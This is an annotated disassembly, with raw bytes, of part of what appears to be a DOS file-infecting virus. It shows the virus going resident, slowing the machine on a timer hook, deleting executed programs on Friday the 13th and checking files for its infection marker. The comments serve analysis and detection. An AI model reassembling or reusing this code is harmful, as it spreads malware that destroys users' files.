; ---------------------------------------------------------------
; Tail of the installer: the resident size is computed and the
; program goes resident. The start of this routine lies before
; this listing. The left columns are the CS-relative offset and
; the raw bytes; W[x]/B[x]/D[x] denote a word/byte/dword at CS:x.
; ---------------------------------------------------------------
030B CD 21 INT 021 ; SubProgram (WAIT) - DOS call prepared before
; this listing; its result is
; Stored in AL
030D B4 31 MOV AH,031 ; AX=31[AL]h: DOS Terminate-and-Stay-Resident,
; AL = exit code left over from above
030F BA 00 06 MOV DX,0600 ; DX=600h (bytes to keep resident)
0312 B1 04 MOV CL,4 ; CL=04h
0314 D3 EA SHR DX,CL ; DX >> 4 (DX=60H): bytes -> paragraphs
0316 83 C2 10 ADD DX,010 ; DX=DX+10h (DX=70h): +10h paragraphs,
; presumably the 100h-byte PSP - confirm
; Resident size is 70h paragraphs
; (= 700h bytes including the PSP), not 70h bytes
0319 CD 21 INT 021 ; Terminate but Stay Resident
; A resident block of this size that outlives the
; program can be seen in the DOS memory-block chain.
031B 32 C0 XOR AL,AL ; Clear AL
031D CF IRET ; Interrupt Return - 031Bh/031Dh form a 3-byte
; stub (AL=0; IRET); which vector it serves is
; set up before this listing - confirm
; ---------------------------------------------------------------
; Replacement INT 08h (timer tick) handler. CS:[01F] is a tick
; countdown: when it reads 2 the text screen is scrolled once,
; when it reaches 0 it is pinned to 1 so that the CPU-burning
; loop at 034Eh runs on every subsequent tick. Both effects are
; observable symptoms of a machine with this code resident.
; ---------------------------------------------------------------
; 031Eh is the new INT 08h
; vector. This routine is
; called 18.2 times per
; second
031E 2E 83 3E 1F 00 02 CS CMP W[01F],2 ; Timer decreased til 02h?
0324 75 17 JNE 033D ; No: -> 033D
; Yes: now 32 minutes are
; passed since infection
; (the initial value of W[01F] is set outside this listing)
0326 50 PUSH AX ; Store Registers
0327 53 PUSH BX
0328 51 PUSH CX
0329 52 PUSH DX
032A 55 PUSH BP
032B B8 02 06 MOV AX,0602 ; INT 10h/06h: scroll window up, AL=2 lines
032E B7 87 MOV BH,087 ; attribute used for the blanked lines
0330 B9 05 05 MOV CX,0505 ; upper-left corner (row 5h, col 5h)
0333 BA 10 10 MOV DX,01010 ; lower-right corner (row 10h, col 10h)
0336 CD 10 INT 010 ; visible payload: a box of the screen scrolls up once
0338 5D POP BP ; Restore Registers
0339 5A POP DX
033A 59 POP CX
033B 5B POP BX
033C 58 POP AX
033D 2E FF 0E 1F 00 CS DEC W[01F] ; Decrease Timer-Trigger
; (after the scroll above it becomes 01h)
0342 75 12 JNE 0356 ; Not 0 yet: -> 0356h (plain pass-through)
0344 2E C7 06 1F 00 01 00 CS MOV W[01F],1 ; Reached 0: pin it to 01h so the DEC
; above yields 0 again on every tick from now on
034B 50 PUSH AX ; Store AX
034C 51 PUSH CX ; Store CX
034D 56 PUSH SI ; Store SI
034E B9 01 40 MOV CX,04001 ; CX=4001h
0351 F3 AC REP LODSB ; Load byte [SI] into AL and
; advance SI, done CX times.
; Pure busy work (the loaded bytes are discarded):
; this is the routine which
; decreases the speed of the
; machine til 1/5th of the
; original. 32 minutes after
; infection this routine
; executes 18.2 times a second.
; A timer tick that takes this long is a usable
; symptom when hunting for this resident code.
0353 5E POP SI ; Restore SI
0354 59 POP CX ; Restore CX
0355 58 POP AX ; Restore AX
0356 2E FF 2E 13 00 CS JMP D[013] ; Jump to original INT 08h
; address (presumably saved at CS:[013] by the
; installer, which is not in this listing)
; ---------------------------------------------------------------
; Replacement INT 21h handler (entry 035Bh). Ordinary calls are
; passed through to DOS via D[017]; three private function
; numbers (AH=E0h, AH=DDh, AH=DEh) are served locally and
; AX=4B00h (Load & Execute) is diverted to the infection code at
; 042Ch. A call with AH=E0h that answers AX=0300h looks like an
; "already installed" handshake - confirm against the installer;
; the private AH values are a stable fingerprint of this code.
; ---------------------------------------------------------------
; Here we come if INT 21h is
; called
035B 9C PUSHF ; Store Flags
035C 80 FC E0 CMP AH,0E0 ; AH=E0h ? (private function)
035F 75 05 JNE 0366 ; No: -> 0366h
0361 B8 00 03 MOV AX,0300 ; AX=0300h - reply to the AH=E0h caller
0364 9D POPF ; Restore Flags
0365 CF IRET ; Interrupt Return
0366 80 FC DD CMP AH,0DD ; AH=DDh? (private function, see 037Eh)
0369 74 13 JE 037E ; Yes: -> 037Eh
036B 80 FC DE CMP AH,0DE ; AH=DEh? (private function, see 0398h)
036E 74 28 JE 0398 ; Yes: -> 0398h
; INT 21h is never called
; with AH=DEh in the code seen so far, so the
; routine at 0398h appears to be unused
; (unverified)
0370 3D 00 4B CMP AX,04B00 ; Load & Execute ?
0373 75 03 JNE 0378 ; No: -> 0378h
0375 E9 B4 00 JMP 042C ; Yes: -> 042Ch (infection routine)
0378 9D POPF ; Restore Flags
0379 2E FF 2E 17 00 CS JMP D[017] ; Jmp to original
; INT 21h address (presumably saved at
; CS:[017] by the installer)
; AH=DDh: transfer control to the host program.
; Stack on entry, assuming the INT 21h frame of 035Bh:
; [PUSHF copy of flags][return IP][return CS][caller's FLAGS]
037E 58 POP AX ; discard the PUSHF copy of the flags
037F 58 POP AX ; discard the return IP
0380 B8 00 01 MOV AX,0100 ; AX=0100h
0383 2E A3 0A 00 CS MOV W[0A],AX ; target offset = 0100h (COM entry point)
0387 58 POP AX ; AX = return CS (the caller's code segment)
0388 2E A3 0C 00 CS MOV W[0C],AX ; target segment
038C F3 A4 REP MOVSB ; copy CX bytes DS:SI -> ES:DI as prepared by
; the caller; presumably restores the host's
; original start bytes before it runs - confirm
038E 9D POPF ; Restore the caller's original FLAGS
038F 2E A1 0F 00 CS MOV AX,W[0F] ; AX = W[0F] (the listing's author notes 0000h)
0393 2E FF 2E 0A 00 CS JMP D[0A] ; far JMP to W[0C]:0100h
; This executes the original
; program
; ---------------------------------------------------------------
; AH=DEh service (0398h). Not reached by any call visible in this
; listing; the author left it uncommented. The per-instruction
; notes below are literal. The overall shape - a block copied
; to CS:021, a program image moved in 64 KB rounds, then control
; transferred through a relocated CS:IP and SS:SP - is only an
; unverified reading.
; ---------------------------------------------------------------
; This routine is called
; when INT 21h with AH=DEh
; is called which never
; happens in the code. I
; have to investigate it
; a bit more. Til then
; it remains without comments.
0398 83 C4 06 ADD SP,6 ; drop 3 words (PUSHF copy, return IP, return CS)
039B 9D POPF ; restore the caller's FLAGS
039C 8C C8 MOV AX,CS ;
039E 8E D0 MOV SS,AX ; SS:SP = CS:0710h - a private stack
03A0 BC 10 07 MOV SP,0710 ; inside the virus body
03A3 06 PUSH ES ; ES saved twice; popped into DS and ES
03A4 06 PUSH ES ; again at 0407h/0408h
03A5 33 FF XOR DI,DI ;
03A7 0E PUSH CS ;
03A8 07 POP ES ; ES = CS
03A9 B9 10 00 MOV CX,010 ; copy 10h bytes from DS:BX to CS:021
03AC 8B F3 MOV SI,BX ; (W[021]..W[02F] are read back below)
03AE BF 21 00 MOV DI,021 ;
03B1 F3 A4 REP MOVSB ;
03B3 8C D8 MOV AX,DS ;
03B5 8E C0 MOV ES,AX ; ES = DS
03B7 2E F7 26 7A 00 CS MUL W[07A] ; DX:AX = DS * W[07A]
03BC 2E 03 06 2B 00 CS ADD AX,W[02B] ; + W[02B] (from the block copied above)
03C1 83 D2 00 ADC DX,0 ;
03C4 2E F7 36 7A 00 CS DIV W[07A] ; AX = quotient, DX = remainder
; (looks like segment:offset normalisation with
; W[07A] as the unit - not verified)
03C9 8E D8 MOV DS,AX ; source DS:SI = AX:DX,
03CB 8B F2 MOV SI,DX ; destination ES:DI = old DS:DX
03CD 8B FA MOV DI,DX ;
03CF 8C C5 MOV BP,ES ; BP = destination segment
03D1 2E 8B 1E 2F 00 CS MOV BX,W[02F] ; BX = number of 64 KB rounds to move
03D6 0B DB OR BX,BX ;
03D8 74 13 JE 03ED ; none: -> 03EDh
03DA B9 00 80 MOV CX,08000 ; 8000h words = 64 KB per round
03DD F3 A5 REP MOVSW ;
03DF 05 00 10 ADD AX,01000 ; advance source and destination
03E2 81 C5 00 10 ADD BP,01000 ; segments by 1000h paragraphs (64 KB)
03E6 8E D8 MOV DS,AX ;
03E8 8E C5 MOV ES,BP ;
03EA 4B DEC BX ;
03EB 75 ED JNE 03DA ; more rounds: -> 03DAh
03ED 2E 8B 0E 2D 00 CS MOV CX,W[02D] ; remaining byte count
03F2 F3 A4 REP MOVSB ;
03F4 58 POP AX ; AX = the ES saved at 03A4h
03F5 50 PUSH AX ; (left on the stack for the POP at 0407h)
03F6 05 10 00 ADD AX,010 ; AX = that segment + 10h paragraphs
03F9 2E 01 06 29 00 CS ADD W[029],AX ; relocate the saved SS (loaded at 0409h)
03FE 2E 01 06 25 00 CS ADD W[025],AX ; and the segment half of D[023]
0403 2E A1 21 00 CS MOV AX,W[021] ;
0407 1F POP DS ; DS = ES = the ES saved on entry
0408 07 POP ES ;
0409 2E 8E 16 29 00 CS MOV SS,W[029] ; switch to the relocated stack
040E 2E 8B 26 27 00 CS MOV SP,W[027] ;
0413 2E FF 2E 23 00 CS JMP D[023] ; far jump to the relocated entry point
; ---------------------------------------------------------------
; Destructive payload (0418h): reached from 042Ch when B[0E]=1,
; i.e. on a Friday the 13th in a year other than 1987 (the flag
; is computed outside this listing). Every program started via
; INT 21h/4B00h is deleted instead of run. The attribute reset
; before the unlink means a read-only attribute does not protect
; the file; only a backup does.
; ---------------------------------------------------------------
; We come here if B[0Eh]=1,
; which means Friday 13th,
; year<>1987. This routine
; deletes the loaded file.
0418 33 C9 XOR CX,CX ; Clear all bits of the File
; Attribute (read-only / hidden / system are
; dropped so the unlink below is not refused)
041A B8 01 43 MOV AX,04301 ; DS:DX still -> ASCIZ filename of the 4B00h call
041D CD 21 INT 021 ; Put File Attributes
041F B4 41 MOV AH,041 ;
0421 CD 21 INT 021 ; Delete a File (Unlink)
0423 B8 00 4B MOV AX,04B00 ; re-issue the caller's Load & Execute
0426 9D POPF ; Get Flags (pushed at 035Bh)
0427 2E FF 2E 17 00 CS JMP D[017] ; to the original INT 21h; the file is gone,
; so DOS presumably reports the exec as failed
; ---------------------------------------------------------------
; INT 21h/AX=4B00h (Load & Execute) hook, 042Ch. Runs before the
; host program starts and decides whether the file named by DS:DX
; is a candidate: free space on its drive is checked, COMMAND.COM
; is skipped, the file is opened and its last 5 bytes are compared
; with CS:0005..0009 to recognise an existing infection, then the
; INT 24h vector is replaced. The routine continues beyond the end
; of this listing; the exits 0547h and 06E7h lie outside it.
; For analysts: the trailing 5-byte marker, the private INT 21h
; functions and an unexpected INT 24h vector are the stable
; identifiers of this resident code.
; ---------------------------------------------------------------
; We come here each time a
; file is loaded with the
; load and execute call
; (INT 21h, AX=4B00h)
042C 2E 80 3E 0E 00 01 CS CMP B[0E],1 ; Is it Friday 13th,
; year<>1987? (flag computed outside this listing)
0432 74 E4 JE 0418 ; Yes: -> 0418h (delete the file instead)
0434 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle = -1: "no file open yet";
; W[070] receives the real handle at 04EDh
043B 2E C7 06 8F 00 00 00 CS MOV W[08F],0 ; Clear Memory-Available
; variable
0442 2E 89 16 80 00 CS MOV W[080],DX ; DS:DX -> ASCIZ Filename,
0447 2E 8C 1E 82 00 CS MOV W[082],DS ; Store DX and DS
044C 50 PUSH AX ; save the caller's registers (the matching
044D 53 PUSH BX ; POPs are beyond this listing)
044E 51 PUSH CX
044F 52 PUSH DX
0450 56 PUSH SI
0451 57 PUSH DI
0452 1E PUSH DS
0453 06 PUSH ES
0454 FC CLD ; string operations count upwards
0455 8B FA MOV DI,DX ; DI -> filename
0457 32 D2 XOR DL,DL ; DL=00h : Take Default Drive
0459 80 7D 01 3A CMP B[DI+1],03A ; ':' at 2nd place in ASCIZ-
; filename
045D 75 05 JNE 0464 ; No: -> 0464h
045F 8A 15 MOV DL,B[DI] ; Get Drive Letter
0461 80 E2 1F AND DL,01F ; Get Drive Code
; 0 = Default
; 1 = A
; 2 = B, etc.
; (AND 1Fh maps 'A'/'a' -> 1, 'B'/'b' -> 2, ...)
0464 B4 36 MOV AH,036 ;
0466 CD 21 INT 021 ; Get disk space
; AX=Sectors per cluster (used by the MUL below)
; BX=# of available clusters
; CX=Bytes per sector
; DX=Total clusters
0468 3D FF FF CMP AX,-1 ; AX=FFFFh: call failed (DOS returns this for
; an invalid drive) rather than "no sectors free"
046B 75 03 JNE 0470 ; No: -> 0470h
046D E9 77 02 JMP 06E7 ; Yes: -> 06E7h (give up; outside this listing)
0470 F7 E3 MUL BX ; Calculate Free Space:
0472 F7 E1 MUL CX ; DX:AX = sectors/cluster * free clusters * bytes/sector
0474 0B D2 OR DX,DX ; 64 KB or more free?
0476 75 05 JNE 047D ; yes: enough
0478 3D 10 07 CMP AX,0710 ; 1808 Bytes Free? (0710h is also the private
; SP loaded at 03A0h; presumably the size of
; the code appended to a victim - confirm)
047B 72 F0 JB 046D ; No: -> 046Dh (-> 06E7h, give up)
047D 2E 8B 16 80 00 CS MOV DX,W[080] ; Restore DX's ASCIZ Filename
0482 1E PUSH DS
0483 07 POP ES ; ES = DS
0484 32 C0 XOR AL,AL ; AL=00h
0486 B9 41 00 MOV CX,041 ; scan at most 41h bytes
0489 F2 AE REPNE SCASB ; find the NUL terminator of the filename
; (the resulting DI is not used below)
048B 2E 8B 36 80 00 CS MOV SI,W[080] ; SI -> filename; the loop 0490h-04A2h
; converts it to UPPERCASE in place
0490 8A 04 MOV AL,B[SI] ;
0492 0A C0 OR AL,AL ; End of string (NUL)?
0494 74 0E JE 04A4 ; If so: -> 04A4h
0496 3C 61 CMP AL,061 ; AL<'a' ?
0498 72 07 JB 04A1 ; Yes: -> 04A1h
049A 3C 7A CMP AL,07A ; AL>'z' ?
049C 77 03 JA 04A1 ; Yes: -> 04A1h
049E 80 2C 20 SUB B[SI],020 ; Transfer filename
; into UPPERCASE (this edits the caller's
; filename buffer in place)
04A1 46 INC SI ; SI=SI+1
04A2 EB EC JMP 0490
04A4 B9 0B 00 MOV CX,0B ; CX=0Bh = length of "COMMAND.COM"
04A7 2B F1 SUB SI,CX ; SI (on the NUL) -> last 11 characters
; of Filename
04A9 BF 84 00 MOV DI,084 ; Start of COMMAND.COM
; filename (constant string in the virus body)
04AC 0E PUSH CS
04AD 07 POP ES ; ES = CS
04AE B9 0B 00 MOV CX,0B
04B1 F3 A6 REPE CMPSB ; Filename=COMMAND.COM ?
04B3 75 03 JNE 04B8 ; No: -> 04B8h
04B5 E9 2F 02 JMP 06E7 ; Yes: -> 06E7h (the shell is left alone)
; We come here if the
; loaded program is not
; COMMAND.COM
04B8 B8 00 43 MOV AX,04300 ;
04BB CD 21 INT 021 ; Get File Attributes (in CX)
04BD 72 05 JB 04C4 ; If Error: -> 04C4h
04BF 2E 89 0E 72 00 CS MOV W[072],CX ; Store File Attributes (MOV leaves CF
; untouched, so the JBs below still see the
; INT 21h result)
04C4 72 25 JB 04EB ; If Error: -> 04EBh (-> 0547h)
04C6 32 C0 XOR AL,AL ; AL=00h
04C8 2E A2 4E 00 CS MOV B[04E],AL ; B[04E]=0
04CC 1E PUSH DS ;
04CD 07 POP ES ; ES = DS
04CE 8B FA MOV DI,DX ; DI -> filename
04D0 B9 41 00 MOV CX,041 ;
04D3 F2 AE REPNE SCASB ; find the NUL; DI now points one past it,
; so B[DI-2] is the last character of the name
04D5 80 7D FE 4D CMP B[DI-2],04D ; "M" ?
04D9 74 0B JE 04E6 ; Yes: -> 04E6h
04DB 80 7D FE 6D CMP B[DI-2],06D ; "m" ?
04DF 74 05 JE 04E6 ; Yes: -> 04E6h
04E1 2E FE 06 4E 00 CS INC B[04E] ; B[04E]=1 when the name does not end in M
; (presumably .COM vs .EXE - confirm against
; the code that reads B[04E])
04E6 B8 00 3D MOV AX,03D00 ; Open Disk File with
04E9 CD 21 INT 021 ; handle in compatibility
; mode, read access (AL=0)
; DS:DX : -> ASCIZ Filename
04EB 72 5A JB 0547 ; IF Error: -> 0547h (outside this listing)
04ED 2E A3 70 00 CS MOV W[070],AX ; Store File Handle
04F1 8B D8 MOV BX,AX ; BX=File Handle
04F3 B8 02 42 MOV AX,04202 ; Move File Read/Write
; Pointer (LSEEK) with
; offset from end of file
04F6 B9 FF FF MOV CX,-1 ; CX:DX = offset in bytes
04F9 BA FB FF MOV DX,-5 ; = -5: position at (length - 5)
04FC CD 21 INT 021 ;
; DX:AX = new absolute
; offset from beginning of
; file
04FE 72 EB JB 04EB ; If Error: -> 04EBh (-> 0547h; the handle in
; W[070] is still open at that point)
0500 05 05 00 ADD AX,5 ; (length - 5) + 5 = file length, low word
0503 2E A3 11 00 CS MOV W[011],AX ; Store Length of File
0507 B9 05 00 MOV CX,5 ; Read from a file with
050A BA 6B 00 MOV DX,06B ; handle BX 5h bytes into
050D 8C C8 MOV AX,CS ; DS:DX buffer = CS:006B
050F 8E D8 MOV DS,AX ; (DS = ES = CS from here until
0511 8E C0 MOV ES,AX ; restored outside this listing)
0513 B4 3F MOV AH,03F ;
0515 CD 21 INT 021 ;
0517 8B FA MOV DI,DX ; DI=DX=6Bh (the 5 bytes just read)
0519 BE 05 00 MOV SI,5 ; SI=05h (5 bytes of the virus's own body)
051C F3 A6 REPE CMPSB ; Compare the last 5 bytes of the file with
; CS:0005..0009: equal means the file already
; carries this code (its infection marker)
051E 75 07 JNE 0527 ; If not: -> 0527h
0520 B4 3E MOV AH,03E ; Close a file with
0522 CD 21 INT 021 ; handle
0524 E9 C0 01 JMP 06E7 ; Jump -> 06E7h (already infected, leave it)
0527 B8 24 35 MOV AX,03524 ; Get original int 24h
052A CD 21 INT 021 ; vector. Stored in ES:BX
052C 89 1E 1B 00 MOV W[01B],BX ; Store BX of INT 24h vector
0530 8C 06 1D 00 MOV W[01D],ES ; Store ES of INT 24h vector
; (DS = CS here, so both stores land in the virus body)
0534 BA 1B 02 MOV DX,021B ; Set new int 24h vector
0537 B8 24 25 MOV AX,02524 ; to DS:DX (= CS:021Bh). INT 24h is the DOS
053A CD 21 INT 021 ; critical-error handler, so this presumably
; keeps disk errors silent - confirm at 021Bh.
; The routine continues beyond this listing.